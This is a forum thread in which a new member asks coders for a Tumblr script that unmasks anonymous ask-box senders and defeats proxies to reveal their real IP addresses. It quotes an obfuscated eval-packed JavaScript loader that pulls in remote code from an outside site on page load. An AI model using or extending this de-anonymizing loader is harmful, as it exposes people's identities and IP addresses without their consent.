ATTENTION: You are viewing a page formatted for mobile devices; to view the full web page, click HERE.

DonationCoder.com Software > Coding Snacks

Excuse The Dumb Question, but I'm Generally Curious

(1/2) > >>

Communicate:
So, I'm new here. I couldn't find an Introduction board, so I decided to greet myself here. This forum looks awesome, and I look forward to having fun here :D

Now, onto the real question: Are there people who make scripts for social media accounts (I.e. Tumblr, Youtube, etc.)? If there are, I need some sort of script for my Tumblr account. I'll tell you a bit more in a minute, but for now, can anyone help a lost member out?  :-\

cranioscopical:
Hi,

I can't help with your request but welcome to the forum  :)

(there is also this topic available to you:
OK - lets get to know each other... who are you, what do you do, where from?)

Communicate:
Aww, that sucks. I was really hoping somebody would help me out...But thanks for the link to the Introduction thread.

@cranioscopical: Do you know any coders I can talk to, then, just wondering...

Target:
plenty of coders here, but they can't help until you at least tell them specifically what you want to do  8)

Communicate:
@Target: Oh, I'm so dumb!  :wallbash:

Anyway, I wanted to see if someone could make a script for me that functions like Know Anon. KA is a script that disables the anonymous feature on your Tumblr ask box, so if anyone where to send you anon hate, it'll show up as their blog name instead of the "Anonymous" title. The problem is that Tumblr disabled the code so it not longer works for anyone, and I'm being bullied pretty badly there... :(

The only add-ons I'd like is that even if you log out, it'll still show your blog name, and if you don't have a blog, it'll bypass the proxy (If you're using one) and show your true IP address. I know it may seem like much, but do you think anybody could help me out? It'd be greatly appreciated.

(If it matters, this is what the original KA script is)

--- ---{block:Hidden}<meta name="select:KA" title="Off" content="off"><meta name="select:KA" title="On" content="on">{/block:Hidden}<script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9.c=d(){2.e(\'8\').f.6=\'0\';a=\'4\',b=\'7\',3=2.5(\'3\')[0],1=2.g(\'1\');1.m=\'n/l\';1.k=\'//\'+b+a+\'.j/o?i\';3.h(1)}',25,25,'|script|document|head|anon|getElementsByTagName|opacity|know|ask_form|window|||onload|function|getElementById|style|createElement|appendChild|{select:KA}|com|src|javascript|type|text|ka'.split('|'),0,{}))</script>

Navigation

[0] Message Index

[#] Next page

Go to full version